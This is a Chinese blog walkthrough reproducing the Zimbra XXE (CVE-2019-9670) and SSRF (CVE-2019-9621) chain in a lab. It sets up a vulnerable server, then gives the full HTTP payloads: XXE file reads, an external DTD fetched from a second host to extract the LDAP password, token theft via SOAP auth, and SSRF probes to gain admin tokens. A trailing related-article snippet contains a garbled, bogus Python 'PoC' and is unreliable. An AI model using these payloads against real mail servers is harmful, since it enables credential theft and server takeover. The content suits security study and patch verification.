Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现

最新推荐文章于 2024-12-04 12:17:07 发布
最新推荐文章于 2024-12-04 12:17:07 发布
阅读量3.3k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: nday复现 文章标签: vim linux 编辑器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44700119/article/details/129478006

参考

zimbra RCE环境搭建到复现再到exp编写
https://xz.aliyun.com/t/7991#toc-5

zimbra RCE 漏洞利用
https://cloud.tencent.com/developer/article/1752450
环境搭建

安装依赖

ubuntu ip addr: 192.168.8.129

apt-get install libgmp10 libperl5.18 unzip pax sysstat sqlite3 dnsmasq wget

ubuntu环境需要为14,其他版本可能安装libperl5.18会报错,后续可能也会有一大堆问题,所以还是用14比较好

配置hostname和dns服务器

vim /etc/hostname

mail.test.com

image-20230304211741392

vim /etc/hosts

192.168.8.129	mail.test.com	mail

image-20230304211941632

vim /etc/dnsmasq.conf

server=192.168.8.130
domain=test.com
mx-host=test.com, mail.test.com, 5
mx-host=mail.test.com, mail.test.com, 5
listen-address=127.0.0.1

image-20230304215010657

下载有漏洞版本的zimbra,解压,进入解压后的目录进行安装

wget https://files.zimbra.com/downloads/8.6.0_GA/zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116.tgz

tar xvf zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116.tgz
cd zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116
sudo ./install.sh

安装时注意观察返回结果,可能会报错缺少依赖信息,按缺少的依赖补充安装即可
一些缺少的依赖可以直接用apt-get安装,对于缺少libgmp3c2,参考文章中的链接已失效,可以采用以下链接安装

wget http://launchpadlibrarian.net/70575439/libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb
sudo dpkg -i libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb

安装配置zimbra

复现时使用的是dnsmasq,所以除了zimbra-dnscache选择 n ,其他默认 y 即可。
之后会进入Main menu界面,选择 6 配置 zimbra-store,选择 4 设置管理员密码,之后输入 a 应用配置,之后默认yes,最后保存更新系统设置yes即可

安装完成后,访问登陆界面即可
https://192.168.8.129:7071/zimbraAdmin
CVE-2019-9670 XXE

漏洞路由

https://192.168.8.130:7071/Autodiscover/Autodiscover.xml

使用burpsuite或者其他接口测试工具以post方式发送一个空标签,Content-Type设置为application/xml,界面返回400解析错误,可能存在xxe

image-20230304223010581

构造XML Poc验证是否存在XXE漏洞

<!DOCTYPE asd [
<!ELEMENT name ANY >
<!ENTITY asd SYSTEM "file:///etc/passwd" >]>
 <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
      <EMailAddress>[email protected]</EMailAddress>
      <AcceptableResponseSchema>&asd;</AcceptableResponseSchema>
    </Request>
  </Autodiscover>

页面503,返回了读取的文件信息,存在XXE

image-20230304223333516

利用xxe获取localconfig.xml 中的用户名和密码,由于localconfig.xml为XML文件,需要加上CDATA标签才能作为文本读取,由于XXE不能内部实体进行拼接,所以此处需要使用外部dtd,payload构造如下:

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

启动远程服务,发送如下payload,利用xxe读取默认用户zimbra的密码,密码字段在zimbra_ldap_password

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 400
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "http://192.168.8.129:99/1.txt">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>

成功读取到密码

image-20230312120557068

CVE-2019-9621 SSRF

利用前面的xxe漏洞读取到的账号密码,获取一个低权限token

POST /service/soap HTTP/1.1
Host: 192.168.8.130
Content-Length: 463
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAccount">
        <account by="adminName">zimbra</account>
        <password>lDsiZPjl</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>

这里是向客户端登陆处/service/soap发送,也可以向管理员登陆处7071端口/service/admin/soap发送payload直接获取高权限token,注意下改端口以及将<AuthRequest xmlns="urn:zimbraAccount">改为<AuthRequest xmlns="urn:zimbraAdmin">

image-20230312143307461

将获取到的低权限token设置到cookie中,探测是否存在ssrf,注意,修改cookie时如果401错误,将cookie字段ZM_AUTH_TOKEN改为ZM_ADMIN_AUTH_TOKEN即可

POST /service/proxy?target=https://abcd.0lzme4.dnslog.cn HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 0
Cookie: ZM_ADMIN_AUTH_TOKEN=0_445fad824269f204515a7c310c0fc7fbfcfc425c_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637383737333133323439343b747970653d363a7a696d6272613b7469643d31303a313338303230313330343b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image-20230312144020869

image-20230312143836682

image-20230312144141257

ssrf可利用后,结合低权限token获取一个高权限token,将<AuthRequest xmlns="urn:zimbraAccount">改为<AuthRequest xmlns="urn:zimbraAdmin">

POST /service/proxy?target=https://192.168.8.130:7071/service/admin/soap HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 461
Cookie: ZM_ADMIN_AUTH_TOKEN=0_445fad824269f204515a7c310c0fc7fbfcfc425c_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637383737333133323439343b747970653d363a7a696d6272613b7469643d31303a313338303230313330343b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAdmin">
        <accou
最低0.47元/天 解锁文章

200万优质内容无限畅学
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
4SecNet团队专栏
04-19 6532
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
Zimbra 远程代码执行漏洞(CVE-2019-9670)环境搭建
4SecNet团队专栏
04-12 1842
Zimbra是著名的开源系统,提供了一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。一体化地提供了邮件收发、文件共享、协同办公、即时聊天等一系列解决方案。
Zimbra邮件服务器渗透利用总结
蛇矛实验室
12-04 5145
Zimbra是一家提供专业的电子邮件软件开发供应商,主要提供ZimbraDesktop邮件管理软件。另外提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。他的最大特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。
Zimbra SSRF+Memcached+反序列化漏洞利用复现
fnmsd的博客
04-12 8868
前言 之前懒了一下,没复现memcached反序列化的部分。 在看本文之前请先看完上一篇复现: https://blog.csdn.net/fnmsd/article/details/88657083 本篇复现基于8.7.11进行复现,就是官网上直接下的。 纯技术研究,请勿使用在非法用途。 环境搭建 直接用docker,https://hub.docker.com/r/jorgedlcruz/zi...
zimbra rce 漏洞复现
weixin_40709439的博客
05-12 7502
本地搭建了好久,虚拟机突然蹦了,。。。 上钟馗之眼和shodan找了个目标 第一步,利用了CVE-2019-9670 XXE漏洞来读取配置文件 Zimbra配置文件位置为/conf/localconfig.xml 根据《A Saga of Code Executions on Zimbra》RCE漏洞分析 https://blog.csdn.net/fnmsd/article/details/88...
CVE-2022-27925 Zimbra任意文件上传漏洞复现
热爱学习,喜欢折腾!
10-26 6161
Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。它最大的特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。Zimbra Collaboration(又称ZCS)8.8.15和9.0具有mboximport功能,可接收ZIP存档并从中提取文件,具有管理员权限的认证用户可以将任意文件上传到系统中,从而导致目录遍历或远程代码执行。
Zimbra漏洞
公众号shadow sock7
08-19 1711
参考: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://nvd.nist.gov/vuln/detail/CVE-2019-9670 https://nvd.nist.gov/vuln/detail/CVE-2016-9924 XXE CVE-2016-9924, CVE-2018-20...
SCANV团队:警惕Zimbra高危安全漏洞
爱尖刀科技媒体 - 曲子龙
12-10 1256
【警惕Zimbra高危安全漏洞】近日,scanv团队监测到国外安全研究者在exploit-db网站上披露的关于Zimbra高危“0day”安全漏洞及攻击代码,攻击者利用漏洞可读取邮件服务器上的任意文件,通过获取到的LDAP信息,即可得到所有用户的密码HASH散列。   用户密码采用OpenLADP SHA算法,通过GPU运算即可暴力破解,该漏洞将为企业或机构带来非常严重的数据泄露风险。攻击者还
[EXP]CVE-2019-9621 Zimbra小于8.8.11 远程代码执行漏洞 XXE GetShell Exploit
K8哥哥
05-08 3472
影响版本: ZimbraCollaboration Server 8.8.11 之前的版本都受到影响。具体来说: Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。 Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。  GetShell代...
Zimbra邮件服务器利用XXE漏洞SSRF完成对目标的文件上传与远程代码执行
勤能补拙
04-06 7366
前言 原文地址:https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html 参考文档:https://blog.csdn.net/fnmsd/article/details/88657083 历史版本存在的RCE(远程代码执行)漏洞CVE-2013-7091本地文件披露漏洞,影响范围为8.0.2以下版本...
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破。
zimbra_poc:Zimbra XXE + SSRF + UPC Poc
03-16
Zimbra POC 用法 需要自己在源代码中修改dtd_url为如下内容的dtd地址: <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start " <![CDATA[ "> <!ENTITY % end " ]]> "> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> 使用方法: python zimbra_poc.py https://target.com POC验证验证使用,不要用于非法用途。 参考资料
关于zimbra复现以及突破
weixin_30721077的博客
04-20 966
Zimbra未登录RCE漏洞利用 首先我是根据这个PDF进行复现的,但是复现过程出现很多问题 首先使用这个XXE读取文件 <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <Autodiscover xmlns="http://sc...
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
include_voidmain的博客
07-07 3443
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
[EXP]CVE-2019-9621 Zimbra<8.8.11 GetShell Exploit(配合Cscan可批量)
weixin_30414245的博客
05-06 1208
发现时间 2019年03月18日 威胁目标 采用Zimbra邮件系统的企业 主要风险 远程代码执行 攻击入口 localconfig.xml 配置文件 使用漏洞 CVE-2019-9621 受影响应用 ZimbraCollabora...
开源邮件平台Zimbra 出现新漏洞,用户登录凭据可被盗
smellycat000的专栏
06-15 2117
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现 Zimbra 邮件套件中又出现一个高危漏洞 (CVE-2022-27924),如遭成功利用可导致未认证攻击者窃取用户明文密码且无需任何用户交互。研究员在报告中指出,“通过对受害者邮箱后续的访问权限,攻击者可能提升对目标组织机构的访问权限,并获得对多种内部服务的访问权限,窃取高度敏感信息。”CVE-2022-...
严重 Zimbra RCE 漏洞遭大规模利用(CVE-2024-45519)
网络研究观
10-02 2393
攻击者正在积极利用 CVE-2024-45519,这是一个严重的 Zimbra 漏洞,该漏洞允许他们在易受攻击的安装上执行任意命令。
zimbra漏洞利用
kzyyx的博客
08-31 4655
记一次渗透测试zimbra漏洞利用 当时通过界面判断判断出开发利用zimbra搭建的网站。zimbra又存在多个漏洞。 1.首先通过利用了CVE-2019-9670 XXE漏洞来尝试读取/etc/passwd 读取文件成功,证明此漏洞可以被成功利用。 2.接下来读取zimbra的配置文件获取密码,因为配置文件时xml文件,因此需要使用外部dtd获取信息。 请求接口:Post:/Autodiscover/Autodiscover.xml Zimbra配置文件位置为/conf/localconfig.xml 在
黑客正在利用Zimbra ZCS中的未修复RCE漏洞
smellycat000的专栏
10-10 1033
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Zimbra 公司的企业协作软件和邮件平台中存在一个严重的远程代码执行漏洞且正遭活跃利用,目前尚不存在补丁。该漏洞的编号是CVE-2022-41352。该漏洞的CVSS评分为9.8,可导致攻击者上传任意文件并在受影响安装程序上执行恶意操作。网络安全公司Rapid7 在分析文章中指出,“该漏洞是因为Zimbra的反病毒引擎 Amavis扫描进站邮件...
CVE-2019-9670复现
最新发布
03-15
### 关于 CVE-2019-9670漏洞复现 #### 漏洞概述 CVE-2019-9670Zimbra Collaboration Suite 中的一个远程代码执行 (RCE) 漏洞。该漏洞允许未经身份验证的攻击者通过发送特制请求到目标服务器上触发 RCE,从而完全控制受影响的应用程序实例。 #### 环境准备 为了成功复现漏洞,需搭建一个易受攻击版本的 Zimbra 协作套件环境。以下是所需条件: 1. **操作系统**: 推荐使用 Ubuntu 或 CentOS 作为基础系统。 2. **软件版本**: 使用存在漏洞Zimbra 版本(例如 Zimbra Collaboration Suite 8.8.x 及更早版本)。这些版本未修复 CVE-2019-9670 漏洞[^2]。 3. **依赖项**: 安装 Java 和其他必要的运行库以支持 Zimbra 正常工作。 #### 复现步骤 以下是具体的漏洞复现过程: 1. 下载并安装指定版本的 Zimbra 软件包。可以通过官方网站或其他可信资源获取旧版二进制文件或源码包。 ```bash wget https://www.zimbra.com/downloads/ sudo apt-get update && sudo apt-get install openjdk-8-jdk ``` 2. 解压下载好的 tarball 文件并将服务初始化起来。 ```bash tar -zxvf zcs-*.*.*_*.tgz cd zcs-*.*.* ./install.sh --platform-override ``` 3. 配置邮件服务器的相关参数,在提示符下输入域名和其他必要选项完成部署流程。 4. 利用公开可用的概念证明脚本来测试是否存在可被利用的安全隐患。可以从 GitHub 上找到对应的 PoC 工具,并按照说明操作。 ```python import requests url = 'http://target/zimbra/' payload = {'cmd': 'echo; id'} response = requests.post(url, data=payload) print(response.text.strip()) ``` 5. 如果一切正常,则应该能够看到返回的结果表明已获得 shell 访问权或者至少确认了命令注入成功的迹象。 注意:上述 Python 脚本仅为演示目的而设计,请勿非法入侵任何网络资产! --- #### 注意事项 尽管无需额外结合 SSRF 缺陷即可达成完整的 RCE 功能,但在实际场景中仍可能遇到防护机制阻碍直接连接外部地址的情况。因此建议深入理解整个攻击链路以及如何规避潜在障碍物。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值